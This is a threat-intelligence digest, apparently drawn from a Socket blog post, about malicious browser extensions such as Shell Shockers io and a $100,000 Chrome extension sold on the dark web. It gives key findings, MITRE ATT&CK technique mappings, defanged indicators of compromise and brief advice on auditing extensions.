Threat Research

The Growing Risk of Malicious Browser Extensions

SocketDev
The Growing Risk of Malicious Browser Extensions

Malicious browser extensions from trusted stores are increasingly exploited to hijack user sessions, redirect traffic, and manipulate social media metrics, posing significant security risks. A notable example includes a malicious Chrome extension sold for $100,000 enabling comprehensive attacks such as credential theft and cryptocurrency draining. #ShellShockersIO #rivemks

Keypoints

  • Browser extensions like Shell Shockers io exploit chrome.windows.create to launch deceptive popups redirecting users to tech support scams.
  • The Wikipedia engelsiz giris extension redirects traffic through a vulnerable proxy to bypass censorship but exposes users to security risks.
  • Some extensions manipulate social media engagement by auto-scrolling and clicking “like” buttons to skew analytics and damage platform authenticity.
  • Operation Phantom Enigma infected over 700 users in Latin America, targeting banking customers and bypassing two-factor authentication through extensions.
  • A malicious Chrome extension sold on the dark web for $100,000 includes features like cookie exfiltration, crypto theft, hidden remote access, and botnet control.
  • Extensions operate with high privileges enabling data exfiltration, keylogging, screen capture, network interception, and persistent backdoors.
  • Users are advised to audit extension permissions, verify developers, and remove unused extensions to mitigate risks.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used in extensions to execute injected JavaScript for crypto draining and interaction automation (“API-based crypto drainer via JavaScript injections”).
  • [T1176] Browser Extensions – Exploited by malicious extensions for session hijacking, redirects, and data exfiltration (“extensions infected 722 users across Latin America… bypassing two-factor authentication”).
  • [T1071] Application Layer Protocol – Used for network interception and redirecting user traffic through proxies and malicious domains (“redirect Wikipedia traffic through a proxy domain”).
  • [T1114] Email Collection – Via stealing authentication tokens and cookies for credential theft (“exfiltrates browser cookies in JSON format every 15 minutes”).
  • [T1119] Automated Collection – Extensions manipulated social media metrics by automatically scrolling and clicking “like” buttons (“artificially inflating likes and views”).
  • [T1219] Remote Access Tools – Hidden Virtual Network Computing (hVNC) functionality in malicious extensions for covert external control (“hidden virtual network computing functionality for covert remote interaction”).
  • [T1565] Data Manipulation – Manipulating user engagement metrics to skew analytics and harm business trust (“some extensions manipulated user engagement metrics on platforms like Facebook”).

Indicators of Compromise

  • [Domain] Malicious redirect domain – funformathgame[.]com used by Shell Shockers io for tech support scams.
  • [Extension Name] Malicious browser extensions – Shell Shockers io, Wikipedia engelsiz giris.
  • [Author] Malicious extension authors – mre1903A (Shell Shockers io), Mehmet Tamac (Wikipedia engelsiz giris), rivemks (seller of a malicious Chrome extension).
  • [Malicious Domain] Proxy domain with vulnerabilities – tr[.]0wikipedia[.]org used by Wikipedia engelsiz giris extension.

Read more: https://socket.dev/blog/the-growing-risk-of-malicious-browser-extensions

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint